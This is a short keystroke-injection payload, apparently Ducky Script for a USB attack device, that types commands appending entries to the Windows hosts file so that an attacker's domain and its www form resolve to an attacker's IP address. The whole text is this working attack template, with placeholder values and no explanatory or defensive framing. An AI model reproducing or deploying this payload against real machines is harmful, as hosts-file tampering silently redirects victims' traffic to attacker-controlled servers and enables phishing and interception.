ENTER
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip www.attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER